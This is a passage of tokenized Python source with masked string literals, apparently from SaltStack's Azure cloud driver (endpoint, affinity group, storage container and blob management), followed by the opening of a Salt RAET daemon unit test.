[ '<STR_LIT>' ] , <EOL> ) <EOL> data = query ( path ) <EOL> if data is None : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' . format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> ret = { } <EOL> for item in data : <EOL> if '<STR_LIT>' not in item : <EOL> continue <EOL> input_endpoint = item [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if not isinstance ( input_endpoint , list ) : <EOL> input_endpoint = [ input_endpoint ] <EOL> for endpoint in input_endpoint : <EOL> ret [ endpoint [ '<STR_LIT:Name>' ] ] = endpoint <EOL> return ret <EOL> def show_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = list_input_endpoints ( kwargs = kwargs , call = '<STR_LIT>' ) <EOL> return data . get ( kwargs [ '<STR_LIT:name>' ] , None ) <EOL> get_input_endpoint = show_input_endpoint <EOL> def update_input_endpoint ( kwargs = None , conn = None , call = None , activity = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if activity != '<STR_LIT>' : <EOL> if '<STR_LIT:port>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = kwargs [ '<STR_LIT:port>' ] <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = str ( kwargs [ '<STR_LIT>' ] ) . lower ( ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:4> <EOL> old_endpoints = list_input_endpoints ( kwargs , call = '<STR_LIT>' ) <EOL> endpoints_xml = '<STR_LIT>' <EOL> endpoint_xml = '''<STR_LIT>''' <EOL> if activity == '<STR_LIT>' : <EOL> old_endpoints [ kwargs [ '<STR_LIT:name>' ] ] = kwargs <EOL> old_endpoints [ kwargs [ '<STR_LIT:name>' ] ] [ '<STR_LIT:Name>' ] = kwargs [ '<STR_LIT:name>' ] <EOL> for endpoint in old_endpoints : <EOL> if old_endpoints [ endpoint ] [ '<STR_LIT:Name>' ] == kwargs [ '<STR_LIT:name>' ] : <EOL> if activity != '<STR_LIT>' : <EOL> this_endpoint_xml = endpoint_xml . format ( ** kwargs ) <EOL> endpoints_xml += this_endpoint_xml <EOL> else : <EOL> this_endpoint_xml = endpoint_xml . format ( <EOL> local_port = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> name = old_endpoints [ endpoint ] [ '<STR_LIT:Name>' ] , <EOL> port = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> protocol = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> enable_direct_server_return = old_endpoints [ endpoint ] [ '<STR_LIT>' ] , <EOL> timeout_for_tcp_idle_connection = old_endpoints [ endpoint ] . get ( '<STR_LIT>' , <NUM_LIT:4> ) , <EOL> ) <EOL> endpoints_xml += this_endpoint_xml <EOL> request_xml = '''<STR_LIT>''' . format ( endpoints_xml ) <EOL> path = '<STR_LIT>' . format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> query ( <EOL> path = path , <EOL> method = '<STR_LIT>' , <EOL> header_dict = { '<STR_LIT:Content-Type>' : '<STR_LIT>' } , <EOL> data = request_xml , <EOL> decode = False , <EOL> ) <EOL> return True <EOL> def add_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> return update_input_endpoint ( <EOL> kwargs = kwargs , <EOL> conn = conn , <EOL> call = '<STR_LIT>' , <EOL> activity = '<STR_LIT>' , <EOL> ) <EOL> def delete_input_endpoint ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> return update_input_endpoint ( <EOL> kwargs = kwargs , <EOL> conn = conn , <EOL> call = '<STR_LIT>' , <EOL> activity = '<STR_LIT>' , <EOL> ) <EOL> def show_deployment ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_deployment_by_name ( <EOL> service_name = kwargs [ '<STR_LIT>' ] , <EOL> deployment_name = kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_deployment = show_deployment <EOL> def list_affinity_groups ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_affinity_groups ( ) <EOL> ret = { } <EOL> for item in data . affinity_groups : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_affinity_group_properties ( affinity_group_name = kwargs [ '<STR_LIT:name>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_affinity_group = show_affinity_group <EOL> def create_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> conn . create_affinity_group ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:label>' ] , <EOL> kwargs [ '<STR_LIT:location>' ] , <EOL> kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def update_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> conn . update_affinity_group ( <EOL> affinity_group_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs [ '<STR_LIT:label>' ] , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> ) <EOL> return show_affinity_group ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def delete_affinity_group ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_affinity_group ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def get_storage_conn ( storage_account = None , storage_key = None , conn_kwargs = None ) : <EOL> '''<STR_LIT>''' <EOL> if conn_kwargs is None : <EOL> conn_kwargs = { } <EOL> if not storage_account : <EOL> storage_account = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , <EOL> default = conn_kwargs . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> if not storage_key : <EOL> storage_key = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , <EOL> default = conn_kwargs . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> return azure . storage . BlobService ( storage_account , storage_key ) <EOL> def make_blob_url ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . make_blob_url ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> ret = { } <EOL> for item in data . containers : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def list_storage_containers ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . list_containers ( ) <EOL> ret = { } <EOL> for item in data . containers : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def create_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> storage_conn . create_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_meta_name_values = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_public_access = kwargs . get ( '<STR_LIT>' , None ) , <EOL> fail_on_exist = kwargs . get ( '<STR_LIT>' , False ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def show_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_container_properties ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container = show_storage_container <EOL> def show_storage_container_metadata ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_container_metadata ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container_metadata = show_storage_container_metadata <EOL> def set_storage_container_metadata ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> x_ms_meta_name_values = yaml . safe_load ( <EOL> kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> storage_conn . set_container_metadata ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_meta_name_values = x_ms_meta_name_values , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def show_storage_container_acl ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_container_acl ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container_acl = show_storage_container_acl <EOL> def set_storage_container_acl ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> data = storage_conn . set_container_acl ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> signed_identifiers = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_public_access = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . delete_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> fail_not_exist = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def lease_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> lease_actions = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if kwargs . get ( '<STR_LIT>' , None ) not in lease_actions : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( lease_actions ) <EOL> ) <EOL> ) <EOL> if kwargs [ '<STR_LIT>' ] != '<STR_LIT>' and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( kwargs [ '<STR_LIT>' ] ) <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . lease_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_action = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_duration = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> x_ms_lease_break_period = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_proposed_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def list_blobs ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . list_blobs ( storage_conn = storage_conn , ** kwargs ) <EOL> def show_blob_service_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_service_properties ( <EOL> timeout = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_blob_service_properties = show_blob_service_properties <EOL> def set_blob_service_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_service_properties ( <EOL> storage_service_properties = kwargs [ '<STR_LIT>' ] , <EOL> timeout = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def show_blob_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> data = storage_conn . get_blob_properties ( <EOL> container_name = kwargs [ '<STR_LIT>' ] , <EOL> blob_name = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> except AzureMissingResourceHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> return data <EOL> get_blob_properties = show_blob_properties <EOL> def set_blob_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_properties ( <EOL> container_name = kwargs [ '<STR_LIT>' ] , <EOL> blob_name = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_blob_cache_control = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_type = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_md5 = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_encoding = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_language = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_disposition = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def put_blob ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . put_blob ( storage_conn = storage_conn , ** kwargs ) <EOL> def get_blob ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . get_blob ( storage_conn = storage_conn , ** kwargs ) <EOL> def query ( path , method = '<STR_LIT:GET>' , data = None , params = None , header_dict = None , decode = True ) : <EOL> '''<STR_LIT>''' <EOL> certificate_path = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> subscription_id = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> management_host = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , <EOL> __opts__ , <EOL> search_global = False , <EOL> default = '<STR_LIT>' <EOL> ) <EOL> requests_lib = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> url = '<STR_LIT>' . format ( <EOL> management_host = management_host , <EOL> subscription_id = subscription_id , <EOL> path = path , <EOL> ) <EOL> if header_dict is None : <EOL> header_dict = { } <EOL> header_dict [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> result = salt . utils . http . query ( <EOL> url , <EOL> method = method , <EOL> params = params , <EOL> data = data , <EOL> header_dict = header_dict , <EOL> port = <NUM_LIT> , <EOL> text = True , <EOL> cert = certificate_path , <EOL> requests_lib = requests_lib , <EOL> decode = decode , <EOL> decode_type = '<STR_LIT>' , <EOL> ) <EOL> if '<STR_LIT>' in result : <EOL> return result [ '<STR_LIT>' ] <EOL> return </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> import unittest2 as unittest <EOL> else : <EOL> import unittest <EOL> import time <EOL> from ioflo . base . consoling import getConsole <EOL> console = getConsole ( ) <EOL> from ioflo . aid . odicting import odict <EOL> from ioflo . test import testing <EOL> from raet . abiding import ns2u <EOL> from raet . lane . stacking import LaneStack <EOL> from raet . road . stacking import RoadStack <EOL> from raet . stacking import Stack <EOL> from salt . utils . event import tagify <EOL> from salt . daemons . flo import core <EOL> from salt . daemons . test . plan import actors <EOL> def setUpModule ( ) : <EOL> console . reinit ( verbosity = console . Wordage . concise ) <EOL> def tearDownModule ( ) : <EOL> pass <EOL> class StatsEventerTestCase ( testing . FrameIofloTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( StatsEventerTestCase , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( StatsEventerTestCase , self ) . tearDown ( ) <EOL> def testMasterContextSetup ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterContextSetup . __doc__ ) ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . reacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> self . assertDictEqual ( act . actor . Ioinits , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertIsInstance ( act . actor . lane_stack . value , LaneStack ) <EOL> self . assertIsInstance ( act . actor . road_stack . value , RoadStack ) <EOL> self . frame . recur ( ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> def testMasterRoadStats ( self ) : <EOL> 